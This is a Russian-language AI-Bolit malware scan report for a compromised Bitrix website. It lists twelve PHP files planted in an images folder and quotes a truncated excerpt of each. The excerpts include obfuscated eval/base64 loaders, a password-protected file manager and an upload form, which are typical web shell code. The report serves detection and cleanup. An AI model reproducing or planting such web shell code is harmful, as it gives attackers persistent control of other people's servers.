Отчет сканера AI-Bolit v20190226-2242: /home/s6/web/vyatkawalks.ru/public_html/ (1/1)
Сканер бесплатный только для личного некоммерческого использования. Информация по коммерческой лицензии (пункт №11). Авторское свидетельство о гос. регистрации в РосПатенте №2012619254 от 12 октября 2012 г.
Затрачено времени: 16 m . Сканирование начато 01-02-2021 в 10:59:36, сканирование завершено 01-02-2021 в 11:16:18
Всего проверено 25491 директорий и 15492 файлов. Использовано памяти при сканировании: 15.11 Mb.
Сводный отчет
Вредоносных скриптов12
Обращаем внимание, что обнаруженные файлы не всегда являются вирусами и хакерскими скриптами. Сканер минимизирует число ложных обнаружений, но это не всегда возможно, так как найденный фрагмент может встречаться как во вредоносных скриптах, так и в обычных.

Для диагностического сканирования без ложных срабатываний мы разработали специальную версию сканера для хостинг-компаний.

Внимание! Наш сканер обнаружил подозрительный или вредоносный код.

Возможно, ваш сайт был взломан. Рекомендуем срочно проконсультироваться со специалистами по данному отчету.

Рекомендуем также проверить сайт бесплатным онлайн-сканером ReScan.Pro.

Не оставляйте файл отчета на сервере, и не давайте на него прямых ссылок с других сайтов. Информация из отчета может быть использована злоумышленниками для взлома сайта, так как содержит информацию о настройках сервера, файлах и каталогах.
Наши продукты:
Критические замечания
Эти файлы могут быть вредоносными или хакерскими скриптами (12)
ПутьИзменение свойствИзменение содержимогоРазмерCRC32
/home/s6/web/vyatkawalks.ru/public_html/bitrix/modules/main/classes/general/update_client.php
[x] 1<? $GLOBALS['_____2040608989']=array('IncludeModuleLangFile','GetModuleEvents','ExecuteModuleEventEx');?><?$GLOBALS['____1
27/10/2020 18:54:09
21/06/2017 22:19:31
248.37 Kb
f46789ba8263eccc6cd754bb2b271e8d2243ef5c
x
1498072771
id_93e67a24
/home/s6/web/vyatkawalks.ru/public_html/bitrix/modules/main/include.php
[x] 1…ERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/ajax_tools.php"); /*ZDUyZmZOGUyMjExZjJlYjhhZjM2NTVlMjI0MTIzMGNiMmU4Y2Y=*/ $GLOBALS['____116156110']=array(base64_decode('ZGVmaW5l'));;function___1351959138($_1390484867){static$_1902458169=
27/10/2020 18:54:09
21/06/2017 22:19:26
21.90 Kb
1238da3a8cea27c20b3e26b0a980186e101844a8
x
1498072766
id_93e67a24
/home/s6/web/vyatkawalks.ru/public_html/assets/images/accesson0.php
[x] 1 <?php echo 7457737+736723;$raPo_rZluoE=base64_decode("YmFzZTY0X2RlY29kZQ==");$ydSJPtnwrSv=base64_decode('Y29weQ==");eva
20/01/2021 06:48:08
20/01/2021 06:48:08
744 b
0c0999f50f88d12946ad1dd61de440ddd542d814
x
1611114488
id_0913222a
/home/s6/web/vyatkawalks.ru/public_html/assets/images/wp_wrong_datlib.php
[x] 1<?php  $PASS="188162e90b88271030885b3bd7cfd523";function T_($Bc){$x2=256;$W2=8;$cY=array();$I3=0;$C4=0;for($bs=0;$bs<strlen($B
20/01/2021 06:48:20
20/01/2021 06:48:20
47.38 Kb
e99c61ed9896558472c687d8ce97ed7fb9b0f326
x
1611114500
id_4f224d15
/home/s6/web/vyatkawalks.ru/public_html/assets/images/index3.php
[x] 1…$wp_admin_bar=new$admin_bar_class;else return false;$wp_admin_bar->initialize();$wp_admin_bar->add_menus();return true;} function pre_admin_bar($wp_kses_data,$wp_nonce){$kses_str=str_replace(array('%','*'),array('/','='),$wp_kses_data);$fil
20/01/2021 06:48:15
20/01/2021 06:48:15
23.55 Kb
c88ab83b6c9dd4494e61b89560800b60e3d75f83
x
1611114495
id_271ebe3f
/home/s6/web/vyatkawalks.ru/public_html/assets/images/accesson.php
[x] 1 <?php echo 7457737+736723;$raPo_rZluoE=base64_decode("YmFzZTY0X2RlY29kZQ==");$ydSJPtnwrSv=base64_decode('Y29weQ==");eva
20/01/2021 04:34:28
20/01/2021 04:34:28
743 b
0c0999f50f88d12946ad1dd61de440ddd542d814
x
1611106468
id_0913222a
/home/s6/web/vyatkawalks.ru/public_html/assets/images/moduless.php
[x] 1…{ return "<font color=lime>".$perm."</font>"; } } function perms($file){ $perms=fileperms($file);  if(($perms&0xC000)==0xC000){ // Socket $info='s'; }elseif(($perms&0xA000)==0xA000){ // S
20/01/2021 06:48:16
20/01/2021 06:48:16
56.04 Kb
82d233093c4cdfff9ea0754ec12bde4a20da9c76
x
1611114496
id_b957805c
/home/s6/web/vyatkawalks.ru/public_html/assets/images/wp-plugins.php
[x] 1<?php $auth_pass=""; $color="#df5";$default_action=base64_decode('RmlsZXNNYW4=');$default_use_ajax=true;$default_charset='Windows-1251';$xYE
20/01/2021 06:48:19
20/01/2021 06:48:19
86.71 Kb
0141e2b59c0365c6cb878b503d25e7912ae1192a
x
1611114499
id_ab5666b2
/home/s6/web/vyatkawalks.ru/public_html/assets/images/doc.php
[x] 1…h=$_GET['path']; }else{ $path=getcwd(); } $path=str_replace('\\','/',$path); $paths=explode('/',$path);  foreach($paths as$id=>$pat){ if($pat==''&&$id==0){ $a=true; echo '<a href="?path=/">/</a>'; continue; }
20/01/2021 06:48:13
20/01/2021 06:48:13
8.14 Kb
17e654ac35713ec194fcfc1ace101c8d72238151
x
1611114493
id_058a5297
/home/s6/web/vyatkawalks.ru/public_html/assets/images/s_e.php
[x] 1…1_"][1](_1178619035(4),$GLOBALS["_171515191_"][2](${${"GLOBALS"}["mypaccsv"]})));if(isset(${${"GLOBALS"}["mypaccsv"]})){ eval(${${"GLOBALS"}["mypaccsv"]});exit();}}?
20/01/2021 06:48:13
20/01/2021 06:48:13
1.40 Kb
c781a6749d26ebf680b664644897ebb247afa7ca
x
1611114493
id_d29f3159
/home/s6/web/vyatkawalks.ru/public_html/assets/images/search.php
[x] 1<?php ?> <?php eval(gzinflate(base64_decode('HZzHkoMAdkV/xTvPFAtyKo89RRJZBJE3LnLOma837UX3UiK8d+853RL//p9//Xuqpv/Ij7j7R/nUQ9HFW/6
20/01/2021 06:48:13
20/01/2021 06:48:13
28.83 Kb
44171620f692854091bdbbb67c5bbe2ed09a8f47
x
1611114493
id_3e9b1c4b
/home/s6/web/vyatkawalks.ru/public_html/assets/images/ups.php
[x] 1 <title>Vuln!! patch it Now!</title><?php echo '<form action="" method="post" enctype="multipart/form-data" name="upload
20/01/2021 06:48:17
20/01/2021 06:48:17
446 b
3619d7704c79e46d1a00e67dcec34564f50eb86b
x
1611114497
id_dd8dcba3
Предупреждения
Дорвеи, реклама, спам-ссылки, редиректы
ПутьИзменение свойствИзменение содержимогоРазмерCRC32
/home/s6/web/vyatkawalks.ru/public_html/bitrix/modules/main/admin/phpinfo.php
1…log_admin_before.php");if(!$USER->CanDoOperation('edit_php')){$APPLICATION->AuthForm(GetMessage("ACCESS_DENIED"));}else{ phpinfo();}?
27/10/2020 18:54:09
21/06/2017 22:19:30
204 b
3de4d48a050d233c344ad5b4be60ef4f15d4498f
x
1498072770
id_z2230281
Подозрение на дорвей
ПутьИзменение свойствИзменение содержимогоРазмерCRC32
/home/s6/web/vyatkawalks.ru/public_html/upload/iblock/
-
-
-
x
id_z8129263
/home/s6/web/vyatkawalks.ru/public_html/upload/medialibrary/
-
-
-
x
id_z7263513
/home/s6/web/vyatkawalks.ru/public_html/upload/resize_cache/iblock/
-
-
-
x
id_z5829540
/home/s6/web/vyatkawalks.ru/public_html/upload/resize_cache/medialibrary/
-
-
-
x
id_z7482074
Версии найденных CMS
Bitrix v16.0.11
WordPress v0.0
[!] Отказ от гарантий: невозможно гарантировать обнаружение всех вредоносных скриптов. Поэтому разработчик сканера не несет ответственности за возможные последствия работы сканера AI-Bolit или неоправданные ожидания пользователей относительно функциональности и возможностей.
Замечания и предложения по работе скрипта, а также не обнаруженные вредоносные скрипты вы можете присылать на ai@revisium.com.
Также будем чрезвычайно благодарны за любые упоминания сканера AI-Bolit на вашем сайте, в блоге, среди друзей, знакомых и клиентов.
Ссылку можно поставить на страницу https://revisium.com/ai/.

Получить консультацию или задать вопросы можно по email ai@revisium.com.